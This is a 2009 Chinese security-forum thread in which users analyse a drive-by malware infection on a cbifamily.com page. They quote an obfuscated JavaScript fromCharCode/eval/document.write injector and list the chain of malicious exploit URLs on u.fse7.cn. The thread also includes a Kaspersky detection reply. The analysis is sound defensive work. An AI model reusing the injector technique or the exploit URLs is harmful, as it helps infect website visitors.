查看: 1577|回复: 4
收起左侧

[其它] 《家用电子》有恶意行为?

[复制链接]
w66guo
发表于 2009-4-17 21:18:00 | 显示全部楼层 |阅读模式
金山网盾有提示,大家试下:

hXXp://ep.cbifamily.com/2008/13/34/78026.html


日志
[2009-04-17 21:14:53] 成功阻止Maxthon.exe访问http://u.fse7.cn/d5/x4/index2.htm,此页面含有应用软件漏洞攻击恶意代码
lichun005
发表于 2009-4-17 21:59:57 | 显示全部楼层
这个解密有要有点耐心,并不是难,而是要计算
下面我看到的代码
Log is generated by FreShow.
[wide]http://ep.cbifamily.com/2008/13/34/78026.html
    [script]http://www.cbifamily.com/publish/countep.php?Id=78026&id2=76758
    [script]http://www.cbifamily.com/publish/counter.php?o=display&type=total&IndexID=78026
    [script]http://www.cbifamily.com/global/footer.js
        [frame]http://www.cbifamily.com/global/h002/ad.jpg(恶意代码在这儿)
t="50 + 30 ,1944 / 27 ,312 / 4 ,212 / 2 ,136 - 37 ,24 + 85 ,1 + 107 ,158 - 39 ,1200 / 12 ,103 - 36 ,105 - 39 ,146 - 31 ,130 - 41 ,70 + 17 ,39 + 14 ,11440 / 104 ,5 + 95 ,135 - 48 ,1540 / 22 ,86 + 24 ,7740 / 86 ,1428 / 17 ,784 / 16 ,13 + 100 ,31 + 58 ,36 + 52 ,131 - 41 ,3536 / 34 ,3267 / 33 ,36 + 14 ,38 + 40 ,146 - 25 ,46 + 51 ,3520 / 40 ,1320 / 20 ,24 + 24 ,121 - 48 ,1008 / 14 ,1326 / 17 ,170 - 49 ,3827 / 43 ,1464 / 12 ,1920 / 40 ,18 + 99 ,147 - 71 ,183 - 78 ,39 + 18 ,10379 / 97 ,5580 / 62 ,30 + 57 ,90 / 1 ,129 - 25 ,15 + 85 ,33 + 54 ,180 - 60 ,92 - 44 ,5776 / 76 ,208 - 99 ,5376 / 48 ,14762 / 121 ,11 + 69 ,9010 / 85 ,199 - 80 ,13924 / 118 ,94 + 5 ,33 + 17 ,141 - 63 ,36 + 85 ,0 + 97 ,150 - 62 ,44 + 22 ,25 + 23 ,129 - 49 ,87 + 16 ,69 - 8 ,85 - 24 ";
t=eval("mydata(String.fromCharCode("+t+"))");
document.write(t);
</script>

其实就是上面这儿需要计算
转化后得到代码src=../default.js
因此需要进入default.js然后esc
可以得到下面挂马网址
Log is generated by FreShow.
[unknown]
    [frame]http://u.fse7.cn/d5/x4/index.htm?03
        [frame]http://u.fse7.cn/d5/x4/index2.htm
            [frame]http://u.fse7.cn/d5/x4/ccqm.htm
            [script]http://u.fse7.cn/d5/x4/js.css
                [frame]http://u.fse7.cn/d5/x4/cc14.htm
                [frame]http://u.fse7.cn/d5/x4/ccfl.htm
                [frame]http://u.fse7.cn/d5/x4/ccvod.htm
                [frame]http://u.fse7.cn/d5/x4/ccxxz.htm
                [frame]http://u.fse7.cn/d5/x4/ccgg.htm
                [frame]http://u.fse7.cn/d5/x4/ccff.htm
                [frame]http://u.fse7.cn/d5/x4/ccbf.htm
                [frame]http://u.fse7.cn/d5/x4/cc122121.htm
        [script]http://js.tongji.cn.yahoo.com/1051064/ystat.js
        [script]http://count7.51much.com/cnt.php?uid=UA-1-12963&style=text&text=网站统计
雨宫优子
发表于 2009-4-17 22:30:24 | 显示全部楼层
这个不用算吧....
直接D>Document.Write清除


或者丢Malzilla...适当的偷懒是可以的
幸福的猪猪
发表于 2009-4-18 10:34:52 | 显示全部楼层

回复 2楼 lichun005 的帖子

跟今天上报的另外两个恶意网页都是一样的回复,看来这3个网页都是同一个人所为的!

Hello,

js.css - Trojan-Downloader.JS.Iframe.ast

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.
The answer is relevant to the latest bases from update sources.


>
>
> hxxp://u.fse7.cn/d5/x4/js.css
>
>
>
>
Regards, Chebyshev Victor
Virus Analyst
10/1, 1st Volokolamsky Proezd, Moscow, 123060, Russia
Tel./Fax: + 7 (495) 797 8700
http://www.kaspersky.com http://www.viruslist.com

[ 本帖最后由 幸福的猪猪 于 2009-4-18 10:37 编辑 ]
qigang
发表于 2009-4-18 23:40:04 | 显示全部楼层
没见着挂马链接了。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 13:29 , Processed in 0.124810 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表